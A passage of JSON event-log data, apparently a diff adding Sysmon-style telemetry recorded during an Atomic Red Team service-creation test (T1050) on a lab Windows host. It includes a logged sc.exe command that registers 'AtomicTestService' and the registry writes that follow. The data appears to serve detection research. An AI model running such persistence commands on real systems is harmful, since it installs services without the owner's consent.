"registry_value": "HKCR", + "timestamp": 131883570715590000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883570715590000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": 
"svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883570715590000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883570715590000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883570715590000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"sc.exe create AtomicTestService binPath= C:\\AtomicRedTeam\\atomics\\T1050\\bin\\AtomicService.exe\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 1480, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570844660000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001074C14C01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1480, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570844650000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001074C14C01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570844650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1480, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570844650000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001074C14C01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1480, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570844650000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001074C14C01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570844650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1480, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570844650000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001074C14C01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570844650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "command_line": "sc.exe create AtomicTestService binPath= C:\\AtomicRedTeam\\atomics\\T1050\\bin\\AtomicService.exe", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 8148, + "ppid": 1480, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "subtype": "create", + "timestamp": 131883570844800000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010BAC24C01}", + "unique_ppid": "{42FC7E13-CADC-5C05-0000-001074C14C01}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 
131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570844810016, 
+ "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1480, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570844650000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001074C14C01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 8148, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010BAC24C01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570844810016, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 8148, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010BAC24C01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 8148, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010BAC24C01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 8148, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010BAC24C01}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 8148, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010BAC24C01}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 8148, + "process_name": "sc.exe", + "process_path": 
"C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010BAC24C01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", + "registry_value": "AtomicTestService", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Type", + "registry_value": "Type", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Start", + "registry_value": "Start", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": 
"services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\ErrorControl", + "registry_value": "ErrorControl", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\ImagePath", + "registry_value": "ImagePath", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\ObjectName", + "registry_value": "ObjectName", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_value": "Disallowed", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 
131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + 